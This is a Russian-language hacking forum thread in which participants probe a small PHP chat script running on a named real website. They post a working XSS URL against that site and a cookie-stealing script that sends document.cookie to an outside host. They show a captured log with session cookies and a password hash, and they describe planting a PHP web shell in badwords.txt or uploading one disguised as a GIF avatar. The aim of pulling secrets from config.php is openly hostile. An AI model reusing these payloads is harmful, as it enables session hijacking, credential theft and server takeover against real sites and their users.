набрёл на один чат: http://schekino.net/chat/login.php решил вот поисследовать его. в итоге оказалось что чат простой до безобразия. 95 кб в архиве. посмотрел возможные уязвимости на securitylab. ничего нету может тогда попробуем поискать уязвимости вместе? я пока мельком пробежался по нему. из папки incl утащил в чистом виде пару файлов: mysqli_functions.inc, mysql_functions.inc, main.inc,smilies.inc, sqlite_functions.inc, skin.inc Файл config.php в корневой лежит. при открытии, что логично, пустая страница. переменные все там хранятся. теперь вот думаем как бы всё это дело утащить. может sql инъекции есть ? или ещё что.
мдя, за 3минуты нашол xss: http://schekino.net/chat/info.php?why=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E хотя толку от нее нету...
я думаю никто не будет против по поводу того что я спущу найденое мной в паблик http://localhost/chat/info.php?reason=<script%20src=http://localhost/s.js></script> s.js PHP: img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie; PHP: REFERER=http://localhost/chat/info.php?reason=%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%2F%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E QUERY=blab_id=1-bb2e48de1ba9a89497564acb9b584cc4; blab_pass=813dfe9bd7b89fbcc5fd29d2be091bac; blab_lang=9; blab_time=3 AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1) + с правами админа можно сдампить БД юзеров, в badwords.txt можно безпалевно вписать PHP: <?php system($_GET[cmd]); ?> - админ этого неувидит, а так же с можно загрузить картинку вместо авы, тоесть PHP шелл без всяких заголовков, правда с расширением gif... и при наличии на сайте локального инклуда я думаю понимаете что можно сделать
InferNo23 согласен. может ещё что сможем интересное найти? Может отсюда что можно накопать? http://schekino.net/chat/empty.txt
сорцы у меня есть. они ж в открытом доступе есть на оф сайте. мне интереснее как можно выудить инфу из config.php важно не само его содержание, а способ узнать инфу тем более, на чате нет системы регистрации. выбрал любой ник и вошёл. админ интерфейса тоже вроде как нет. вот потому и думаю что в итоге то в чате конфиденциального есть
